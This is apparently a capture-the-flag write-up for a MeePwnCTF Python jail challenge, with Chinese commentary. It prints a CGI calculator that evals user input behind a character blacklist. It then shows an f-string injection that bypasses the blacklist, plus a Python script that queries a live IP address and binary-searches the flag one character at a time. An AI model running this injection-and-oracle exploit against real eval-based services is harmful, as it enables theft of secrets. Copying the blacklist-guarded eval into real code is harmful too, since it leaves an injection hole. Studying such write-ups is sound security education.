This code is supposed to be unexploitable :/ another pyjail?
[Source]Try this or this
Notice: The flag may contain non alphabetic characters (but still printable)
#!/usr/bin/env pythonimport cgi
import sys
from html import escape
FLAG = open('/var/www/flag', 'r').read()
OK_200 ="some HTML code"print(OK_200)
arguments = cgi.FieldStorage()
if'source'in arguments:
source = arguments['source'].value
else:
source =0if source =='1':
print('<pre>'+ escape(str(open(__file__, 'r').read())) +'</pre>')
if'value1'in arguments and'value2'in arguments and'op'in arguments:
defget_value(val): val = str(val)[:64]
if str(val).isdigit(): return int(val)
blacklist = ['(', ')', '[', ']', '\'',
'"'] # I don't like tuple, list and dict.if val ==''or [c for c in blacklist if c in val] != []:
print('<center>Invalid value</center>')
sys.exit(0)
return val
defget_op(val): val = str(val)[:2]
list_ops = ['+', '-', '/', '*', '=', '!']
if val ==''or val[0] notin list_ops:
print('<center>Invalid op</center>')
sys.exit(0)
return val
op = get_op(arguments['op'].value)
value1 = get_value(arguments['value1'].value)
value2 = get_value(arguments['value2'].value)
if str(value1).isdigit() ^ str(value2).isdigit():
print('<center>Types of the values don\'t match</center>')
sys.exit(0)
calc_eval = str(repr(value1)) + str(op) + str(repr(value2))
print(
'<div class=container><div class=row><div class=col-md-2></div><div class="col-md-8"><pre>' )
print('>>>> print('+ escape(calc_eval) +')')
try:
result = str(eval(calc_eval))
if result.isdigit() or result =='True'or result =='False':
print(result)
else:
print(
"Invalid" ) # Sorry we don't support output as a string due to security issue.except:
print("Invalid")
print('>>> </pre></div></div></div>')
server.py 只改动了一行代码,将 op = get_op(arguments['op'].value) 变成了 op = get_op(get_value(arguments['op'].value)) ,也就是说将op 参数也进行了黑名单过滤,于是 op 的第二个字符就不能是单引号,第一题的方法也就失效了。
>>>str(repr('T'))+str('+f')+str(repr('ru{FLAG<source or 14:x}')) # 14的十六进制表示时'e'"'T'+f'ru{FLAG<source or 14:x}'">>>eval(str(repr('T'))+str('+f')+str(repr('ru{1 or 14:x}')))
'Tru1'# 返回Invalid>>>eval(str(repr('T'))+str('+f')+str(repr('ru{0 or 14:x}')))
'True'
import requests, re
defcalc(v1, v2, op, s): u ="http://206.189.223.3/cgi-bin/server.py?" payload = dict(value1=v1, value2=v2, op=op, source=s)
r = requests.get(u, params=payload)
res = re.findall("<pre>\n>>>>([\s\S]*)\n>>> <\/pre>",
r.content)[0].split('\n')[1]
return res =='Invalid'defcheck(mid): s = flag + chr(mid)
return calc(v1, v2, op, s)
defbin_search(seq=xrange(0x20, 0x80), lo=0, hi=None):assert (lo >=0)
if hi ==None: hi = len(seq)
while lo < hi:
mid = (lo + hi) //2if check(seq[mid]): hi = mid
else: lo = mid +1return seq[lo]
flag =''v1, op, v2, s ='T', "+f", "ru{FLAG<source or 14:x}", 'a'while (1):
flag += chr(bin_search() -1)
print flag
# MeePwnCTF{python3.6[_strikes_backkkkkkkkkkkk)}